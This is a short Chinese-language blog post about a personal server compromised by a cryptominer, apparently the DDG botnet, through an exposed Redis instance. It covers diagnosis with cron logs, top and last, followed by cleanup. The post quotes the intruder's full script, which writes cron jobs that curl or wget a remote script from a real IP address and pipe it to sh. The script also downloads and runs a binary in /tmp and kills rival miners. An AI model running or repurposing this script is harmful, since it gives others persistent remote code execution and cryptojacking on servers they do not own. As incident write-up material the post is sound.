记一次服务器被挖矿

记一次服务器被挖矿

突然收到阿里的通知,说服务器定时脚本有异常

查看定时脚本

果然是有异常,不知道那里来的两个定时

查看定时脚本执行状态

$ tail -f /var/log/cron

top命令检查进程

随后就发现wnTKYg进程

查看服务器登录日志,看是否有其他人登录过

$ last -x

登录也是正常,说明确实是入侵

下载下来看一下定时脚本的内容

以下代码是入侵者的shell脚本

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://35.160.117.10:8443/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://35.160.117.10:8443/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://35.160.117.10:8443/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://35.160.117.10:8443/i.sh | sh" >> /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.2020" ]; then
    curl -fsSL http://35.160.117.10:8443/2020/ddg.$(uname -m) -o /tmp/ddg.2020
fi

if [ ! -f "/tmp/ddg.2020" ]; then
    wget -q http://35.160.117.10:8443/2020/ddg.$(uname -m) -O /tmp/ddg.2020
fi

chmod +x /tmp/ddg.2020 && /tmp/ddg.2020

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

删除脚本中创建的文件和目录,同时kill掉进程

注意这里也要也会有两个进程wnTKY 和 gddg.2020,同时关闭Redis公网访问

这次会被入侵,有可能是我上次为了测试,打开了Redis公网访问

点击这里查看Redis公网访问漏洞